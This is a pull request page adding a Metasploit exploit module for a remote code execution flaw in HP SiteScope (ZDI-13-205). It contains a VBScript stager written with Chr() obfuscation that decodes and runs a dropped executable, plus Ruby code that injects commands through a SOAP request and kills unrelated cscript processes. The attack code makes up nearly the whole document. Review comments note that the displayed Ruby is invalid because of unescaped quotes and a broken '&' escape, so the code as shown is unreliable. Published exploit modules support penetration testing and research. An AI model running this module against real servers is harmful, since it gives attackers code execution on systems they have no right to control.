Exploit for ZDI-13-205 #2327
Merged
Commits
8 commits
94125a4
Add module for ZDI-13-205
34b3ee5
Update ranking and description
b6245ee
Update target info
6b1d754
Refactor, avoid duplicate code
3681955
Use Msf::Config.data_directory
5c06a47
Get the call result
34b4995
Merge for retab
7d4bf0c
Retab changes for PR #2327
@@ -0,0 +1,49 @@ | ||
echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub | ||
echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub | ||
echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub | ||
echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub | ||
echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub | ||
echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub | ||
echo tempString = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub | ||
echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub | ||
echo Set wshShell = CreateObject(scriptShell) >>decode_stub | ||
echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub | ||
echo Set fs = CreateObject(scriptingFS) >>decode_stub | ||
echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub | ||
echo If file.Size Then >>decode_stub | ||
echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub | ||
echo data = fd.ReadAll >>decode_stub | ||
echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub | ||
echo data = Replace(data, vbCrLf, nil) >>decode_stub | ||
echo data = base64_decode(data) >>decode_stub | ||
echo fd.Close >>decode_stub | ||
echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub | ||
echo ofs.Write data >>decode_stub | ||
echo ofs.close >>decode_stub | ||
echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub | ||
echo Else >>decode_stub | ||
echo Wscript.Echo emptyString >>decode_stub | ||
echo End If >>decode_stub | ||
echo Function base64_decode(byVal strIn) >>decode_stub | ||
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub | ||
echo For n = 1 To Len(strIn) Step 4 >>decode_stub | ||
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub | ||
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub | ||
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub | ||
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub | ||
echo If Not w2 Then _ >>decode_stub | ||
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub | ||
echo If Not w3 Then _ >>decode_stub | ||
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub | ||
echo If Not w4 Then _ >>decode_stub | ||
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub | ||
echo Next >>decode_stub | ||
echo base64_decode = strOut >>decode_stub | ||
echo End Function >>decode_stub | ||
echo Function mimedecode(byVal strIn) >>decode_stub | ||
echo If Len(strIn) = 0 Then >>decode_stub | ||
echo mimedecode = -1 : Exit Function >>decode_stub | ||
echo Else >>decode_stub | ||
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub | ||
echo End If >>decode_stub | ||
echo End Function >>decode_stub |
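Review bot: `nil` in `Replace(data, Chr(32)+vbCrLf, nil)` and the following `Replace(data, vbCrLf, nil)` is not a VBScript keyword. As written it is an undeclared variable holding Empty, which Replace coerces to an empty string, so the CRLF stripping works by accident and would fail with a runtime error if Option Explicit were ever added to the stub. Since the stub cannot contain quote characters, `vbNullString` expresses the intended empty replacement explicitly. Two smaller points: `fs.GetFile(tempDir+encodedFile)` raises a "File not found" error before the `If file.Size` test is reached, so the `emptyString` message only covers a zero-length file, not a missing one (an `fs.FileExists` check first would cover both); and this view does not show the path header for this hunk, while the module's `DefaultOptions` points at `data/exploits/cmdstager/vbs_b64_noquot`, so please confirm that is where this file lands.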
173 changes: 173 additions & 0 deletions
modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
@@ -0,0 +1,173 @@ | ||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# web site for more information on licensing and terms of use. | ||
# http://metasploit.com/ | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class Metasploit3 < Msf::Exploit::Remote | ||
Rank = ManualRanking | ||
|
||
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::CmdStagerVBS | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'HP SiteScope Remote Code Execution', | ||
'Description' => %q{ | ||
This module exploits a code execution flaw in HP SiteScope. | ||
The vulnerability exists on the opcactivate.vbs script, which | ||
is reachable from the APIBSMIntegrationImpl AXIS service, and | ||
uses WScript.Shell.run() to execute cmd.exe with user provided | ||
data. Note which the opcactivate.vbs component is installed | ||
with the (optional) HP Operations Agent component. The module | ||
has been tested successfully on HP SiteScope 11.20 (with HP | ||
Operations Agent) over Windows 2003 SP2. | ||
}, | ||
'Author' => | ||
[ | ||
'rgod <rgod[at]autistici.org>', # Vulnerability discovery | ||
'juan vazquez' # Metasploit module | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
[ 'CVE', '2013-2367'], | ||
[ 'OSVDB', '95824' ], | ||
[ 'BID', '61506' ], | ||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-205/' ] | ||
], | ||
'Privileged' => true, | ||
'Platform' => 'win', | ||
'Arch' => ARCH_X86, | ||
'Targets' => | ||
[ | ||
[ 'HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2', {} ] | ||
], | ||
'DefaultTarget' => 0, | ||
'DefaultOptions' => | ||
{ | ||
'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot") | ||
}, | ||
'DisclosureDate' => 'Jul 29 2013')) | ||
|
||
register_options( | ||
[ | ||
Opt::RPORT(8080), | ||
OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/']) | ||
], self.class) | ||
end | ||
|
||
def uri | ||
uri = normalize_uri(target_uri.path) | ||
uri << '/' if uri[-1,1] != '/' | ||
return uri | ||
end | ||
|
||
def check | ||
|
||
op = rand_text_alpha(8 + rand(10)) | ||
key = rand_text_alpha(8 + rand(10)) | ||
value = rand_text_alpha(8 + rand(10)) | ||
|
||
res = send_soap_request(op, key, value) | ||
|
||
if res and res.code == 200 and res.body =~ /runOMAgentCommandResponse/ | ||
return Exploit::CheckCode::Detected | ||
end | ||
|
||
return Exploit::CheckCode::Safe | ||
end | ||
|
||
def exploit | ||
@peer = "#{rhost}:#{rport}" | ||
|
||
print_status("#{@peer} - Delivering payload...") | ||
|
||
# The path to the injection is something like: | ||
# * Java exec => cscript => WScript.Shell => cmd.exe (injection happens) | ||
# Empirically has been tested a 1500 value for :linemax makes it work | ||
# reliable | ||
execute_cmdstager({:linemax => 1500}) | ||
end | ||
|
||
def get_vbs_string(str) | ||
vbs_str = "" | ||
str.each_byte { |b| | ||
vbs_str << "Chr(#{b})+" | ||
} | ||
|
||
return vbs_str.chomp("+") | ||
end | ||
|
||
# Make the modifications required to the specific encoder | ||
# This exploit uses an specific encoder because quotes (") | ||
# aren't allowed when injecting commands | ||
def execute_cmdstager_begin(opts) | ||
var_decoded = @stager_instance.instance_variable_get(:@var_decoded) | ||
var_encoded = @stager_instance.instance_variable_get(:@var_encoded) | ||
decoded_file = "#{var_decoded}.exe" | ||
encoded_file = "#{var_encoded}.b64" | ||
@cmd_list.each { |command| | ||
# Because the exploit kills cscript processes to speed up and reliability | ||
command.gsub!(/cscript \/\/nologo/, "wscript //nologo") | ||
command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file)) | ||
command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file)) | ||
} | ||
end | ||
|
||
def execute_command(cmd, opts={}) | ||
# HTML Encode '&' character | ||
# taskkill allows to kill the cscript process which is triggering the | ||
# different operations performed by the OPACTIVATE command. It speeds | ||
# up exploitation and improves reliability (some processes launched can die | ||
# due to the fake activation). But this line also will kill other cscript | ||
# legit processes which could be running on the target host. Because of it | ||
# the exploit has a Manual ranking | ||
command = ""127.0.0.1 && " | ||
command << cmd.gsub(/&/, "&") | ||
command << " && taskkill /F /IM cscript.exe "" | ||
|
||
res = send_soap_request("OPCACTIVATE", "omHost", command) | ||
|
||
if res.nil? or res.code != 200 or res.body !~ /runOMAgentCommandResponse/ | ||
fail_with(Failure::Unknown, "#{@peer} - Unexpected response, aborting...") | ||
end | ||
|
||
end | ||
|
||
def send_soap_request(op, key, value) | ||
data = "<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" " | ||
data << "xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:api=\"http://Api.freshtech.COM\">" | ||
data << "<soapenv:Header/>" | ||
data << "<soapenv:Body>" | ||
data << "<api:runOMAgentCommand soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" | ||
data << "<in0 xsi:type=\"x-:Map\" xmlns:x-=\"http://xml.apache.org/xml-soap\">" | ||
data << "<item xsi:type=\"x-:mapItem\">" | ||
data << "<key xsi:type=\"xsd:string\">#{key}</key>" | ||
data << "<value xsi:type=\"xsd:string\">#{value}</value>" | ||
data << "</item>" | ||
data << "</in0>" | ||
data << "<in1 xsi:type=\"xsd:string\">#{op}</in1>" | ||
data << "</api:runOMAgentCommand>" | ||
data << "</soapenv:Body>" | ||
data << "</soapenv:Envelope>" | ||
|
||
res = send_request_cgi({ | ||
'uri' => normalize_uri(uri, 'services', 'APIBSMIntegrationImpl'), | ||
'method' => 'POST', | ||
'ctype' => 'text/xml; charset=UTF-8', | ||
'data' => data, | ||
'headers' => { | ||
'SOAPAction' => '""' | ||
} | ||
}) | ||
|
||
return res | ||
end | ||
|
||
end |
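Review bot: `execute_command` is not valid Ruby as displayed: `command = ""127.0.0.1 && "` and `command << " && taskkill /F /IM cscript.exe ""` contain an unescaped double quote inside a double-quoted literal, and `cmd.gsub(/&/, "&")` replaces `&` with itself, which contradicts the `# HTML Encode '&' character` comment directly above it. If escaped quotes and an `&amp;` entity were lost in rendering, please verify the merged file; either way, a standard XML escaping helper applied to the value is less error-prone than a hand-written substitution, and the encoding comment belongs next to the gsub line rather than above the taskkill explanation. Documentation nit in the description: "Note which the opcactivate.vbs component" should read "Note that the opcactivate.vbs component". The taskkill side effect on unrelated cscript processes is clearly documented and the ManualRanking matches it, which is good.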
👍 avoiding quotes